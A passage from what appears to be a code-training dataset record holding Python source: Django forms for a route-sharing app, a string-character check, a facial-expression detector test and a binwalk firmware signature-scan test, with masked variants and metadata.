class Meta:
model = Route
fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',
'created_by')
def clean_title(self):
title = self.cleaned_data['title']
try:
Route.objects.get(title=title)
raise forms.ValidationError(self.error_messages[
'duplicate_title'], code='duplicate_title')
except Route.DoesNotExist:
return title
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput(attrs={
'placeholder': 'Password'}), label='')
username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Username'}), label='')
email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Email'}), label='', required=False)
class Meta:
model = User
fields = 'username', 'email', 'password'
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = 'picture',
<|reserved_special_token_1|>
from django import forms
from crawlr.models import Route, Category, UserProfile
from django.contrib.auth.models import User
class CategoryForm(forms.ModelForm):
name = forms.CharField(max_length=128, help_text=
'Please enter the category name.')
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
class Meta:
model = Category
fields = 'name',
class RouteForm(forms.ModelForm):
error_messages = {'duplicate_title':
'Please enter a unique name for the crawl'}
title = forms.CharField(max_length=128, help_text=
'Please enter the name of the Crawl')
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
start = forms.CharField(widget=forms.HiddenInput())
end = forms.CharField(widget=forms.HiddenInput())
waypts = forms.CharField(widget=forms.HiddenInput())
category = forms.ModelChoiceField(queryset=Category.objects.all())
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget
=forms.HiddenInput())
class Meta:
model = Route
fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',
'created_by')
def clean_title(self):
title = self.cleaned_data['title']
try:
Route.objects.get(title=title)
raise forms.ValidationError(self.error_messages[
'duplicate_title'], code='duplicate_title')
except Route.DoesNotExist:
return title
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput(attrs={
'placeholder': 'Password'}), label='')
username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Username'}), label='')
email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Email'}), label='', required=False)
class Meta:
model = User
fields = 'username', 'email', 'password'
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = 'picture',
<|reserved_special_token_1|>
from django import forms
from crawlr.models import Route, Category, UserProfile
from django.contrib.auth.models import User
class CategoryForm(forms.ModelForm):
    """Form for creating a Category.

    Only ``name`` is shown to the user.  ``views`` and ``likes`` start
    at zero and ``slug`` is optional and hidden -- presumably it is
    filled in server-side before saving (TODO confirm at the view).
    """
    name = forms.CharField(max_length=128,
        help_text = "Please enter the category name.")
    views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
    likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
    slug = forms.CharField(widget=forms.HiddenInput(), required=False)

    class Meta:
        # Only the name is taken from user input; the model supplies
        # the rest.
        model = Category
        fields = ('name',)
class RouteForm(forms.ModelForm):
    """Form for creating a Route (a "crawl").

    The route geometry (``start``, ``end``, ``waypts``) arrives through
    hidden inputs populated by the find-directions map page; the user
    only types a title and picks a category.
    """
    error_messages = {'duplicate_title':'Please enter a unique name for the crawl'}
    title = forms.CharField(max_length=128,
        help_text = "Please enter the name of the Crawl")
    views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
    #Hidden inputs for the variables retrieved from find directions page
    start = forms.CharField(widget=forms.HiddenInput())
    end = forms.CharField(widget=forms.HiddenInput())
    waypts = forms.CharField(widget=forms.HiddenInput())
    #Location choice, a drop down menu selection
    category = forms.ModelChoiceField(queryset=Category.objects.all())
    slug = forms.CharField(widget=forms.HiddenInput(), required=False)
    created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget=forms.HiddenInput())

    class Meta:
        model = Route
        fields = ('category', 'title', 'slug', 'start', 'end', 'waypts', 'created_by')

    def clean_title(self):
        """Validate that the crawl title is not already taken.

        Uses an existence query rather than ``Route.objects.get``: if
        the database already contains duplicate titles, ``get`` would
        raise an unhandled ``MultipleObjectsReturned`` (a 500) instead
        of this validation error, and ``exists()`` also avoids loading
        the full row.
        """
        title = self.cleaned_data["title"]
        if Route.objects.filter(title=title).exists():
            raise forms.ValidationError(
                self.error_messages['duplicate_title'],  # customized error message
                code='duplicate_title',
            )
        return title
class UserForm(forms.ModelForm):
    """Registration form for Django's built-in ``User``.

    Labels are blanked and placeholders carry the prompts instead.
    NOTE(review): ``password`` is a plain CharField here; the view is
    expected to hash it (e.g. ``user.set_password``) before saving --
    confirm at the call site.
    """
    password = forms.CharField(widget=forms.PasswordInput(attrs={'placeholder' : 'Password'}), label='')
    username = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Username'}), label='')
    email = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Email'}), label='', required=False)

    class Meta:
        model = User
        fields = ('username', 'email', 'password')
class UserProfileForm(forms.ModelForm):
    """Form exposing only the profile picture of a ``UserProfile``."""

    class Meta:
        model = UserProfile
        fields = ('picture',)
|
flexible
|
{
"blob_id": "abf25cf3d4435754b916fa06e5e887b1e3589a1c",
"index": 5073,
"step-1": "<mask token>\n\n\nclass RouteForm(forms.ModelForm):\n error_messages = {'duplicate_title':\n 'Please enter a unique name for the crawl'}\n title = forms.CharField(max_length=128, help_text=\n 'Please enter the name of the Crawl')\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n start = forms.CharField(widget=forms.HiddenInput())\n end = forms.CharField(widget=forms.HiddenInput())\n waypts = forms.CharField(widget=forms.HiddenInput())\n category = forms.ModelChoiceField(queryset=Category.objects.all())\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget\n =forms.HiddenInput())\n\n\n class Meta:\n model = Route\n fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',\n 'created_by')\n\n def clean_title(self):\n title = self.cleaned_data['title']\n try:\n Route.objects.get(title=title)\n raise forms.ValidationError(self.error_messages[\n 'duplicate_title'], code='duplicate_title')\n except Route.DoesNotExist:\n return title\n\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput(attrs={\n 'placeholder': 'Password'}), label='')\n username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Username'}), label='')\n email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Email'}), label='', required=False)\n\n\n class Meta:\n model = User\n fields = 'username', 'email', 'password'\n\n\nclass UserProfileForm(forms.ModelForm):\n\n\n class Meta:\n model = UserProfile\n fields = 'picture',\n",
"step-2": "<mask token>\n\n\nclass CategoryForm(forms.ModelForm):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n model = Category\n fields = 'name',\n\n\nclass RouteForm(forms.ModelForm):\n error_messages = {'duplicate_title':\n 'Please enter a unique name for the crawl'}\n title = forms.CharField(max_length=128, help_text=\n 'Please enter the name of the Crawl')\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n start = forms.CharField(widget=forms.HiddenInput())\n end = forms.CharField(widget=forms.HiddenInput())\n waypts = forms.CharField(widget=forms.HiddenInput())\n category = forms.ModelChoiceField(queryset=Category.objects.all())\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget\n =forms.HiddenInput())\n\n\n class Meta:\n model = Route\n fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',\n 'created_by')\n\n def clean_title(self):\n title = self.cleaned_data['title']\n try:\n Route.objects.get(title=title)\n raise forms.ValidationError(self.error_messages[\n 'duplicate_title'], code='duplicate_title')\n except Route.DoesNotExist:\n return title\n\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput(attrs={\n 'placeholder': 'Password'}), label='')\n username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Username'}), label='')\n email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Email'}), label='', required=False)\n\n\n class Meta:\n model = User\n fields = 'username', 'email', 'password'\n\n\nclass UserProfileForm(forms.ModelForm):\n\n\n class Meta:\n model = UserProfile\n fields = 'picture',\n",
"step-3": "<mask token>\n\n\nclass CategoryForm(forms.ModelForm):\n name = forms.CharField(max_length=128, help_text=\n 'Please enter the category name.')\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n\n\n class Meta:\n model = Category\n fields = 'name',\n\n\nclass RouteForm(forms.ModelForm):\n error_messages = {'duplicate_title':\n 'Please enter a unique name for the crawl'}\n title = forms.CharField(max_length=128, help_text=\n 'Please enter the name of the Crawl')\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n start = forms.CharField(widget=forms.HiddenInput())\n end = forms.CharField(widget=forms.HiddenInput())\n waypts = forms.CharField(widget=forms.HiddenInput())\n category = forms.ModelChoiceField(queryset=Category.objects.all())\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget\n =forms.HiddenInput())\n\n\n class Meta:\n model = Route\n fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',\n 'created_by')\n\n def clean_title(self):\n title = self.cleaned_data['title']\n try:\n Route.objects.get(title=title)\n raise forms.ValidationError(self.error_messages[\n 'duplicate_title'], code='duplicate_title')\n except Route.DoesNotExist:\n return title\n\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput(attrs={\n 'placeholder': 'Password'}), label='')\n username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Username'}), label='')\n email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Email'}), label='', required=False)\n\n\n class Meta:\n model = User\n fields = 'username', 'email', 'password'\n\n\nclass UserProfileForm(forms.ModelForm):\n\n\n class Meta:\n model = UserProfile\n fields = 'picture',\n",
"step-4": "from django import forms\nfrom crawlr.models import Route, Category, UserProfile\nfrom django.contrib.auth.models import User\n\n\nclass CategoryForm(forms.ModelForm):\n name = forms.CharField(max_length=128, help_text=\n 'Please enter the category name.')\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n\n\n class Meta:\n model = Category\n fields = 'name',\n\n\nclass RouteForm(forms.ModelForm):\n error_messages = {'duplicate_title':\n 'Please enter a unique name for the crawl'}\n title = forms.CharField(max_length=128, help_text=\n 'Please enter the name of the Crawl')\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n start = forms.CharField(widget=forms.HiddenInput())\n end = forms.CharField(widget=forms.HiddenInput())\n waypts = forms.CharField(widget=forms.HiddenInput())\n category = forms.ModelChoiceField(queryset=Category.objects.all())\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget\n =forms.HiddenInput())\n\n\n class Meta:\n model = Route\n fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',\n 'created_by')\n\n def clean_title(self):\n title = self.cleaned_data['title']\n try:\n Route.objects.get(title=title)\n raise forms.ValidationError(self.error_messages[\n 'duplicate_title'], code='duplicate_title')\n except Route.DoesNotExist:\n return title\n\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput(attrs={\n 'placeholder': 'Password'}), label='')\n username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Username'}), label='')\n email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Email'}), label='', required=False)\n\n\n class Meta:\n model = User\n fields = 'username', 'email', 
'password'\n\n\nclass UserProfileForm(forms.ModelForm):\n\n\n class Meta:\n model = UserProfile\n fields = 'picture',\n",
"step-5": "from django import forms\nfrom crawlr.models import Route, Category, UserProfile\nfrom django.contrib.auth.models import User\n\nclass CategoryForm(forms.ModelForm):\n name = forms.CharField(max_length=128,\n help_text = \"Please enter the category name.\")\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n\n class Meta:\n model = Category\n fields = ('name',)\n\nclass RouteForm(forms.ModelForm):\n error_messages = {'duplicate_title':'Please enter a unique name for the crawl'}\n title = forms.CharField(max_length=128,\n help_text = \"Please enter the name of the Crawl\")\n\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n #Hidden inputs for the variables retrieved from find directions page\n start = forms.CharField(widget=forms.HiddenInput())\n end = forms.CharField(widget=forms.HiddenInput())\n waypts = forms.CharField(widget=forms.HiddenInput())\n #Location choice, a drop down menu selection\n category = forms.ModelChoiceField(queryset=Category.objects.all())\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget=forms.HiddenInput())\n\n class Meta:\n model = Route\n fields = ('category', 'title', 'slug', 'start', 'end', 'waypts', 'created_by')\n\n def clean_title(self):\n title = self.cleaned_data[\"title\"]\n try:\n Route.objects.get(title=title)\n\n raise forms.ValidationError(\n self.error_messages['duplicate_title'], # customized error message\n code='duplicate_title',\n )\n except Route.DoesNotExist:\n return title\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput(attrs={'placeholder' : 'Password'}), label='')\n username = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Username'}), label='')\n email = 
forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Email'}), label='', required=False)\n\n class Meta:\n model = User\n fields = ('username', 'email', 'password')\n\nclass UserProfileForm(forms.ModelForm):\n class Meta:\n model = UserProfile\n fields = ('picture',)\n",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
"""You are given a string .
Your task is to find out if the string contains:
alphanumeric characters, alphabetical characters, digits,
lowercase and uppercase characters."""
s = raw_input()
print(any(i.isalnum()for i in s))
print(any(i.isalpha()for i in s))
print(any(i.isdigit()for i in s))
print(any(i.islower()for i in s))
print(any(i.isupper()for i in s))
""" any() in python returns
True is any of element of the iterable(list,tuple,dict,set etc) are true
to the condition else returns False."""
|
normal
|
{
"blob_id": "f29fa3d796d9d403d6bf62cb28f5009501c55545",
"index": 3650,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(any(i.isalnum() for i in s))\nprint(any(i.isalpha() for i in s))\nprint(any(i.isdigit() for i in s))\nprint(any(i.islower() for i in s))\nprint(any(i.isupper() for i in s))\n<mask token>\n",
"step-3": "<mask token>\ns = raw_input()\nprint(any(i.isalnum() for i in s))\nprint(any(i.isalpha() for i in s))\nprint(any(i.isdigit() for i in s))\nprint(any(i.islower() for i in s))\nprint(any(i.isupper() for i in s))\n<mask token>\n",
"step-4": "\"\"\"You are given a string .\r\nYour task is to find out if the string contains:\r\nalphanumeric characters, alphabetical characters, digits,\r\nlowercase and uppercase characters.\"\"\"\r\n\r\ns = raw_input()\r\nprint(any(i.isalnum()for i in s))\r\nprint(any(i.isalpha()for i in s))\r\nprint(any(i.isdigit()for i in s))\r\nprint(any(i.islower()for i in s))\r\nprint(any(i.isupper()for i in s))\r\n\r\n\r\n\"\"\" any() in python returns\r\nTrue is any of element of the iterable(list,tuple,dict,set etc) are true\r\nto the condition else returns False.\"\"\"\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_detector():
detector = Detector(n_jobs=1)
assert detector['n_jobs'] == 1
assert type(detector) == Detector
inputFname = os.path.join(get_test_data_path(), 'input.jpg')
out = detector.detect_image(inputFname=inputFname)
assert type(out) == Fex
assert len(out) == 1
assert out.happiness.values[0] > 0
outputFname = os.path.join(get_test_data_path(), 'output.csv')
out = detector.detect_image(inputFname=inputFname, outputFname=outputFname)
assert out
assert os.path.exists(outputFname)
out = pd.read_csv(outputFname)
assert out.happiness.values[0] > 0
inputFname = os.path.join(get_test_data_path(), 'input.mp4')
out = detector.detect_video(inputFname=inputFname)
assert len(out) == 72
outputFname = os.path.join(get_test_data_path(), 'output.csv')
out = detector.detect_video(inputFname=inputFname, outputFname=outputFname)
assert out
assert os.path.exists(outputFname)
out = pd.read_csv(outputFname)
assert out.happiness.values.max() > 0
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from feat.detector import Detector
from feat.data import Fex
from feat.utils import get_resource_path
from .utils import get_test_data_path
import pandas as pd
import feat
import os
import wget
def test_detector():
detector = Detector(n_jobs=1)
assert detector['n_jobs'] == 1
assert type(detector) == Detector
inputFname = os.path.join(get_test_data_path(), 'input.jpg')
out = detector.detect_image(inputFname=inputFname)
assert type(out) == Fex
assert len(out) == 1
assert out.happiness.values[0] > 0
outputFname = os.path.join(get_test_data_path(), 'output.csv')
out = detector.detect_image(inputFname=inputFname, outputFname=outputFname)
assert out
assert os.path.exists(outputFname)
out = pd.read_csv(outputFname)
assert out.happiness.values[0] > 0
inputFname = os.path.join(get_test_data_path(), 'input.mp4')
out = detector.detect_video(inputFname=inputFname)
assert len(out) == 72
outputFname = os.path.join(get_test_data_path(), 'output.csv')
out = detector.detect_video(inputFname=inputFname, outputFname=outputFname)
assert out
assert os.path.exists(outputFname)
out = pd.read_csv(outputFname)
assert out.happiness.values.max() > 0
<|reserved_special_token_1|>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `feat` package."""
from feat.detector import Detector
from feat.data import Fex
from feat.utils import get_resource_path
from .utils import get_test_data_path
import pandas as pd
import feat
import os
import wget
# def test_models():
# print("Downloading FEX emotion model.")
# fex_emotion_model = "https://github.com/cosanlab/feat/releases/download/v0.1/fer_aug_model.h5"
# wget.download(fex_emotion_model, get_resource_path())
# if os.path.exists(os.path.join(get_resource_path(), "fer_aug_model.h5")):
# print("\nFEX emotion model downloaded successfully.\n")
# else:
# print("Something went wrong. Model not found in directory.")
# print("Downloading landmark detection model.")
# lbfmodel = "https://github.com/cosanlab/feat/releases/download/v0.1/lbfmodel.yaml"
# wget.download(lbfmodel, get_resource_path())
# if os.path.exists(os.path.join(get_resource_path(), "lbfmodel.yaml")):
# print("\nLandmark detection model downloaded successfully.\n")
# else:
# print("Something went wrong. Model not found in directory.")
# emotion_model = "fer_aug_model.h5"
# emotion_model_path = os.path.join(get_resource_path(), emotion_model)
# print("PATH TO EMOTION MODEL",emotion_model_path)
# assert os.path.exists(emotion_model_path)==True
# landmark_model = "lbfmodel.yaml"
# landmark_model_path = os.path.join(get_resource_path(), landmark_model)
# assert os.path.exists(landmark_model_path)==True
def test_detector():
    """Smoke-test Detector on the bundled sample image and video.

    Checks the in-memory Fex result, then the CSV written via outputFname,
    for both detect_image and detect_video.
    """
    detector = Detector(n_jobs=1)
    assert detector['n_jobs'] == 1
    assert type(detector) == Detector

    # --- image detection: in-memory result ---
    image_path = os.path.join(get_test_data_path(), "input.jpg")
    result = detector.detect_image(inputFname=image_path)
    assert type(result) == Fex
    assert len(result) == 1
    assert result.happiness.values[0] > 0

    # --- image detection: CSV output ---
    csv_path = os.path.join(get_test_data_path(), "output.csv")
    result = detector.detect_image(inputFname=image_path, outputFname=csv_path)
    assert result
    assert os.path.exists(csv_path)
    result = pd.read_csv(csv_path)
    assert result.happiness.values[0] > 0

    # --- video detection: in-memory result ---
    video_path = os.path.join(get_test_data_path(), "input.mp4")
    result = detector.detect_video(inputFname=video_path)
    assert len(result) == 72

    # --- video detection: CSV output ---
    csv_path = os.path.join(get_test_data_path(), "output.csv")
    result = detector.detect_video(inputFname=video_path, outputFname=csv_path)
    assert result
    assert os.path.exists(csv_path)
    result = pd.read_csv(csv_path)
    assert result.happiness.values.max() > 0
|
flexible
|
{
"blob_id": "753bdbf080e7a8652c39e40beeae51f74382d606",
"index": 1300,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_detector():\n detector = Detector(n_jobs=1)\n assert detector['n_jobs'] == 1\n assert type(detector) == Detector\n inputFname = os.path.join(get_test_data_path(), 'input.jpg')\n out = detector.detect_image(inputFname=inputFname)\n assert type(out) == Fex\n assert len(out) == 1\n assert out.happiness.values[0] > 0\n outputFname = os.path.join(get_test_data_path(), 'output.csv')\n out = detector.detect_image(inputFname=inputFname, outputFname=outputFname)\n assert out\n assert os.path.exists(outputFname)\n out = pd.read_csv(outputFname)\n assert out.happiness.values[0] > 0\n inputFname = os.path.join(get_test_data_path(), 'input.mp4')\n out = detector.detect_video(inputFname=inputFname)\n assert len(out) == 72\n outputFname = os.path.join(get_test_data_path(), 'output.csv')\n out = detector.detect_video(inputFname=inputFname, outputFname=outputFname)\n assert out\n assert os.path.exists(outputFname)\n out = pd.read_csv(outputFname)\n assert out.happiness.values.max() > 0\n",
"step-3": "<mask token>\nfrom feat.detector import Detector\nfrom feat.data import Fex\nfrom feat.utils import get_resource_path\nfrom .utils import get_test_data_path\nimport pandas as pd\nimport feat\nimport os\nimport wget\n\n\ndef test_detector():\n detector = Detector(n_jobs=1)\n assert detector['n_jobs'] == 1\n assert type(detector) == Detector\n inputFname = os.path.join(get_test_data_path(), 'input.jpg')\n out = detector.detect_image(inputFname=inputFname)\n assert type(out) == Fex\n assert len(out) == 1\n assert out.happiness.values[0] > 0\n outputFname = os.path.join(get_test_data_path(), 'output.csv')\n out = detector.detect_image(inputFname=inputFname, outputFname=outputFname)\n assert out\n assert os.path.exists(outputFname)\n out = pd.read_csv(outputFname)\n assert out.happiness.values[0] > 0\n inputFname = os.path.join(get_test_data_path(), 'input.mp4')\n out = detector.detect_video(inputFname=inputFname)\n assert len(out) == 72\n outputFname = os.path.join(get_test_data_path(), 'output.csv')\n out = detector.detect_video(inputFname=inputFname, outputFname=outputFname)\n assert out\n assert os.path.exists(outputFname)\n out = pd.read_csv(outputFname)\n assert out.happiness.values.max() > 0\n",
"step-4": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Tests for `feat` package.\"\"\"\n\nfrom feat.detector import Detector\nfrom feat.data import Fex\nfrom feat.utils import get_resource_path\nfrom .utils import get_test_data_path\nimport pandas as pd\nimport feat\nimport os\nimport wget\n\n# def test_models():\n# print(\"Downloading FEX emotion model.\")\n# fex_emotion_model = \"https://github.com/cosanlab/feat/releases/download/v0.1/fer_aug_model.h5\"\n# wget.download(fex_emotion_model, get_resource_path())\n\n# if os.path.exists(os.path.join(get_resource_path(), \"fer_aug_model.h5\")):\n# print(\"\\nFEX emotion model downloaded successfully.\\n\")\n# else:\n# print(\"Something went wrong. Model not found in directory.\")\n\n# print(\"Downloading landmark detection model.\")\n# lbfmodel = \"https://github.com/cosanlab/feat/releases/download/v0.1/lbfmodel.yaml\"\n# wget.download(lbfmodel, get_resource_path())\n\n# if os.path.exists(os.path.join(get_resource_path(), \"lbfmodel.yaml\")):\n# print(\"\\nLandmark detection model downloaded successfully.\\n\")\n# else:\n# print(\"Something went wrong. 
Model not found in directory.\")\n\n# emotion_model = \"fer_aug_model.h5\"\n# emotion_model_path = os.path.join(get_resource_path(), emotion_model)\n# print(\"PATH TO EMOTION MODEL\",emotion_model_path)\n# assert os.path.exists(emotion_model_path)==True\n\n# landmark_model = \"lbfmodel.yaml\"\n# landmark_model_path = os.path.join(get_resource_path(), landmark_model)\n# assert os.path.exists(landmark_model_path)==True\n\ndef test_detector():\n detector = Detector(n_jobs=1)\n assert detector['n_jobs']==1\n assert type(detector)==Detector\n\n # Test detect image\n inputFname = os.path.join(get_test_data_path(), \"input.jpg\")\n out = detector.detect_image(inputFname = inputFname)\n assert type(out) == Fex\n assert len(out) == 1\n assert out.happiness.values[0] > 0 \n\n outputFname = os.path.join(get_test_data_path(), \"output.csv\")\n out = detector.detect_image(inputFname=inputFname, outputFname=outputFname)\n assert out\n assert os.path.exists(outputFname)\n out = pd.read_csv(outputFname)\n assert out.happiness.values[0] > 0 \n\n # Test detect video\n inputFname = os.path.join(get_test_data_path(), \"input.mp4\")\n out = detector.detect_video(inputFname=inputFname)\n assert len(out)==72\n\n outputFname = os.path.join(get_test_data_path(), \"output.csv\")\n out = detector.detect_video(inputFname=inputFname, outputFname=outputFname)\n assert out\n assert os.path.exists(outputFname)\n out = pd.read_csv(outputFname)\n assert out.happiness.values.max() > 0",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_firmware_squashfs():
"""
Test: Open hello-world.srec, scan for signatures
verify that only one signature is returned
verify that the only signature returned is Motorola S-rec data-signature
"""
expected_results = [[0,
'DLOB firmware header, boot partition: "dev=/dev/mtdblock/2"'], [
112,
'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'
], [1179760,
'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'
], [1179792,
'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'
]]
scan_result = binwalk.scan(dirname(__file__) +
'/input-vectors/firmware.squashfs', signature=True, quiet=True,
extract=True)
eq_(len(scan_result), 1)
eq_(len(scan_result[0].results), len(expected_results))
for i in range(0, len(scan_result[0].results)):
eq_(scan_result[0].results[i].offset, expected_results[i][0])
eq_(scan_result[0].results[i].description, expected_results[i][1])
<|reserved_special_token_1|>
from os.path import dirname
import binwalk
from nose.tools import eq_, ok_
def test_firmware_squashfs():
"""
Test: Open hello-world.srec, scan for signatures
verify that only one signature is returned
verify that the only signature returned is Motorola S-rec data-signature
"""
expected_results = [[0,
'DLOB firmware header, boot partition: "dev=/dev/mtdblock/2"'], [
112,
'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'
], [1179760,
'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'
], [1179792,
'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'
]]
scan_result = binwalk.scan(dirname(__file__) +
'/input-vectors/firmware.squashfs', signature=True, quiet=True,
extract=True)
eq_(len(scan_result), 1)
eq_(len(scan_result[0].results), len(expected_results))
for i in range(0, len(scan_result[0].results)):
eq_(scan_result[0].results[i].offset, expected_results[i][0])
eq_(scan_result[0].results[i].description, expected_results[i][1])
<|reserved_special_token_1|>
from os.path import dirname
import binwalk
from nose.tools import eq_, ok_
def test_firmware_squashfs():
    """Scan input-vectors/firmware.squashfs for signatures and verify that
    exactly one module ran and that every reported result matches the
    expected (offset, description) list below.
    """
    expected_results = [
        [0, 'DLOB firmware header, boot partition: "dev=/dev/mtdblock/2"'],
        [112, 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'],
        [1179760, 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'],
        [1179792, 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'],
    ]

    # Throws a warning for the missing external extractor.
    scan_result = binwalk.scan(
        dirname(__file__) + '/input-vectors/firmware.squashfs',
        signature=True,
        quiet=True,
        extract=True)

    # One module ran, reporting exactly as many results as expected.
    eq_(len(scan_result), 1)
    eq_(len(scan_result[0].results), len(expected_results))
    # Pairwise comparison of each result against its expectation.
    for actual, (offset, description) in zip(scan_result[0].results, expected_results):
        eq_(actual.offset, offset)
        eq_(actual.description, description)
|
flexible
|
{
"blob_id": "d55043c2a18b935478d9be442aaf7305231edc7d",
"index": 5828,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_firmware_squashfs():\n \"\"\"\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n \"\"\"\n expected_results = [[0,\n 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'], [\n 112,\n 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'\n ], [1179760,\n 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'\n ], [1179792,\n 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'\n ]]\n scan_result = binwalk.scan(dirname(__file__) +\n '/input-vectors/firmware.squashfs', signature=True, quiet=True,\n extract=True)\n eq_(len(scan_result), 1)\n eq_(len(scan_result[0].results), len(expected_results))\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n",
